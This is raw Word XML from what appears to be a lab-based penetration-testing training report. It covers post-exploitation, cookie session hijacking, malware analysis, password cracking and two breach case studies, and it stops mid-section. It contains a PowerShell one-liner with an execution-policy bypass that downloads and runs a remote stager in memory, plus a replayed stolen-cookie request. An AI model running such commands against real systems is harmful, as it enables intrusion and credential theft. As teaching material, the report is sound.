    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="6AFF78DA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="280F38B6" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Executing an in-memory fileless payload bypass string on the target</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.10:8080/stager.ps1')"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6398E358" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4538A197" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65CC421F" w14:textId="7B569FAD" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The execution pulls down the raw payload code string and executes it directly in RAM via the Invoke-Expression (IEX) pipeline. Within seconds, a stealth agent checks into the Starkiller dashboard, giving the analyst deep post-exploitation module access (mimikatz, lsassy credential dumping, and full-screen captures) without writing a single binary file to disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F34AEE" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179" w:rsidP="00266179">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E78681" w14:textId="77777777" w:rsidR="00266179" w:rsidRDefault="00266179" w:rsidP="00266179">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056A7D90" w14:textId="108E3081" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>11. Web Interception Proxies &amp; Session Hijacking Labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615FBCED" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Web application penetration testing focuses heavily on the interception, parsing, and manipulation of HTTP traffic passing between a user's browser and backend databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DFB21B" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>12.1 Configuration of Caido and Hetty Proxy Interceptors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C07FC4" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The training integrated modern, fast, rust/go-engineered intercepting proxy tools—Caido Desktop and Hetty Server—on the Kali Linux attacker node. The victim machine browser (Firefox) was routed through a custom HTTP proxy string pointing directly back to the Kali listener node on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9315"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="3F9D3364" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="4A777A"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43F24065" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="4A777A"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL STEP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t>To inspect TLS-encrypted HTTPS traffic without certificate errors, the proxy's self-generated root CA Certificate (e.g., caido.crt) must be explicitly imported into the Windows Certificate Authority Trust Store, enabling full visibility into underlying web traffic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CC94EDC" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>12.2 Session Hijacking Scenario on Vulnerable Application Spaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E304FF" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>A live session capture attack was executed against a vulnerable staging site (https://testphp.vulnweb.com/). The workflow was structured as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D437185" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>1. Login Interception: The victim logs in using legitimate credentials, which are captured in real-time by the Caido history stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66CEB6" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>2. Token Extraction: The analyst extracts the unique state cookie string from the HTTP response headers (e.g., Set-Cookie: PHPSESSID=3a9f...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6614FC53" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>3. Repeater Infiltration: The stolen cookie string is injected into an unauthenticated browser session via the Caido Repeater module, instantly taking over the account identity without requiring the user's password.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="5E0BB3F1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E20DEAF" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stolen session cookie injection header inside Caido Repeater module</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>GET / HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Host: testphp.vulnweb.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D3D4163" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C000C2" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00266179"/>
    <w:p w14:paraId="4AEE3115" w14:textId="52022E88" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00266179">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>12. Malware Analysis Protocols &amp; Password Cracking Internal Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDCBDF" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Understanding how to reverse engineer compiled threat binaries and evaluate authentication hashes is essential for building resilient modern defense architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE3014E" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>13.1 Quad-Tier Malware Analysis Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5D843" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The training structured a clear, four-tier methodology for analyzing unknown binary files and identifying key Indicators of Compromise (IOCs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533674C1" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>1. Static Analysis: Checking cryptographic file hashes on VirusTotal, extracting embedded text strings, and parsing PE file headers via PEStudio to identify packed or obfuscated code sections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B29F7F6" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>2. Dynamic Analysis: Running the sample in an isolated sandbox VM while monitoring system activity in real-time using Process Monitor (ProcMon), tracking socket mutations via TCPView, and taking registry snapshots using RegShot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A8F21" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>3. Reverse Engineering: Loading compiled binaries into Ghidra to decompile machine code back into structured assembly logic and trace execution flow paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F1BB15" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>4. IOC Documentation: Compiling a definitive report documenting file hashes, target command-and-control IPs, created registry locations, and modified system paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13681EFC" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A2E327" w14:textId="4B7CF24C" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>13.2 Windows Authentication Cryptography &amp; Password Cracking Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F136CB" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The training mapped out the evolution of modern Windows authentication architecture, tracking legacy LAN Manager (LM) split-block architectures to modern NT LAN Manager (NTLM) hashing schemes. Password cracking strategies were systematically broken down into core tactical vector matrices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFEB9A" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Dictionary Attack Matrices: Matching target hashes against pre-compiled common password lists (e.g., rockyou.txt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8E5554" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Hybrid Password Engineering: Appending automated rulesets onto wordlists to mimic common user formatting habits, like adding current years or special characters (e.g., P@ssword2026!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C3DF3" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Password Spraying Subroutines: Firing a single common password across hundreds of corporate accounts simultaneously to avoid triggering local account lockout thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59916339" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Precomputed Rainbow Tables: Utilizing large, pre-calculated hash libraries to recover plain text passwords instantly. Modern systems defeat this approach by appending unique cryptographic salts to password strings before hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DB878" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0191A53E" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A5C5DD" w14:textId="783AC482" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>13. Real-World Case Studies &amp; Threat Analysis Matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A4726B" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>To bridge the gap between classroom theory and real-world enterprise architecture, two major cybersecurity breaches were analyzed to understand how foundational footprinting and social engineering drive complex network intrusions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC6697B" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>14.1 Target Corporation Data Breach (2013) - Supply Chain Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C98222" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The devastating Target breach demonstrated how public footprinting can expose weak links in an organization's vendor ecosystem. Attackers used open-source intelligence to identify an external HVAC contractor (Fazio Mechanical Services) that possessed remote access privileges to Target's network. After compromising the vendor via a targeted phishing campaign, the attackers moved laterally into internal corporate systems and deployed custom credit card scraping malware across thousands of active Point-of-Sale</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> (POS) registers, resulting in the theft of over 40 million payment card records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC761B" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3591FBCA" w14:textId="2D129C21" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>14.2 Twitter (X) Social Engineering Attack (2020) - Identity Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C753905" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The high-profile 2020 Twitter compromise highlighted how human vectors can render strong technical security controls obsolete. Attackers leveraged LinkedIn footprinting to map out internal support departments and identify employees who possessed administrative account access. Using targeted vishing (voice phishing) and impersonation techniques, the attackers manipulated these employees into providing internal portal credentials, enabling the compromise of prominent verified accounts (including Elon Musk and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bill Gates) to run a high-volume cryptocurrency scam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86C197" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285D9143" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781936FA" w14:textId="289A8BDC" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>14.3 Strategic Enterprise Hardening Countermeasures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5EFD91" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
